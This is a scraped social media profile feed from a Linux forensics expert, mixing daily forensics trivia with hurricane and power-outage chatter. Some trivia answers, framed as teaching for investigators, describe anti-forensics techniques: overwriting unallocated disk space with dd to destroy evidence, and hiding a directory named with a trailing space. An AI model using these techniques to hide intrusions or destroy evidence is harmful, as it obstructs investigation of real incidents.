I am retiring this social media account. Find me as @hal_pomeranz@infosec.exchange

Orlando, FL
Joined November 2008
Hal Pomeranz retweeted
This is a real treat!
Wow That’s an amazing deep dive on NTP, its creator David Mills, and old school open source communities. newyorker.com/tech/annals-of…
1
2
Daily Linux Forensics Trivia #26 - Name three different logs where you can normally find a record of user logins.
2
1
Trivia Answer #25 - Look at the user’s $HOME/.viminfo file. The file contains information on recently edited files, search terms, commands typed at the “:” prompt, and (probably most useful in this case) commands executed via shell escape.
3
Replying to @daveshackleford
“Self-discovery”?
1
1
Holy smokes! Glad to hear the prognosis is good though. Rest up, big buddy!
And power is restored! Thanks @DukeEnergy for working so hard for Floridians in the wake of hurricane Ian.
10
Daily Linux Forensics Trivia #25 —A user’s .bash_history file shows repeated use of “sudo vim” with no other arguments. What other artifact could you inspect to get a better picture of their activities?
3
2
7
Trivia Answer #24 - One of the directories is named “.. “ (dot dot space) or some other similar name with a non-printing character. Use “ls -b” to see the non-printing characters. @MalwareJake was suspiciously quick with the answer on this one… almost as if… nah!
1
1
11
Replying to @elpie
We’re good, although power has been out since this morning. The storm ended up crossing the state well south of us—very unpredictable storm track on this one.
Replying to @jeffmcjunkin
If you have on-prem Exchange, assume breach
1
3
Replying to @johullrich
We lost power this morning after the storm had passed us to the south. Looks like most of the greater Orlando area is without power.
Let me add that a lot of these folks come in from out of state to support us during these disasters. They leave their homes and families and head into harm’s way to get the lights back on. Bravo!
40k+ linemen are waiting by in Florida right now ready to go to work when they can. Legit superstars.
3
4
31
Daily Linux Forensics Trivia #24 - You look at a directory listing and there are two subdirectories named “..”. How is this possible?
3
1
8
If you’re in a virtual environment that doesn’t pre-allocate disks, this also has the side-effect of increasing the storage used by your instance and making it more costly to get a forensic copy.
1
Trivia Answer #23 - Lots of responses, including @rvandenbrink, @DfirNotes, and @jtsylve. The dd command will create a file called junk that will consume all unallocated blocks and overwrite them with random data. This should obliterate any evidence in unallocated.
2
Replying to @darthsaac
Good so far— just a lot of rain and wind here. You all OK?
1
Replying to @bettersafetynet
I have to explain to my dog that it’s going to be windy and rainy for the next 48 hours and the bathroom is still OUTSIDE
1
2
Also can we take a moment to recognize your mom's badass koala socks!
This panel was a lot of fun!
Here's more good stuff from Way West 2022...it's "Everything Old is New Again" with @hal_pomeranz , @edskoudis , @AlyssaM_InfoSec, and Tony Sager! youtube.com/watch?v=cT3YXCqe…
2